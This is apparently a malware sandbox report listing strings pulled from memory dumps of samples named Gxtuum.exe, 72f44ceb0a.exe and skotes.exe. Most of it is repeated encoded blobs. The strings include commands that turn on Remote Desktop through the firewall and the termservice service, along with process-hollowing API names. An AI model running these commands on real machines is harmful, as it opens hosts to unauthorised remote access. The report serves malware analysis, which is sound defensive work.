Source: 72f44ceb0a.exe, 00000024.00000000.2584274322.0000000001011000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy 
DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000025.00000002.2596732466.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000025.00000002.2596732466.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy 
DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000025.00000000.2594215239.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000025.00000000.2594215239.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy 
DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000026.00000000.2605199027.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000026.00000000.2605199027.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy 
DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000026.00000002.2931326382.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000026.00000002.2931326382.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy 
DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0017EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 5_2_0017EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0017DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 5_2_0017DF51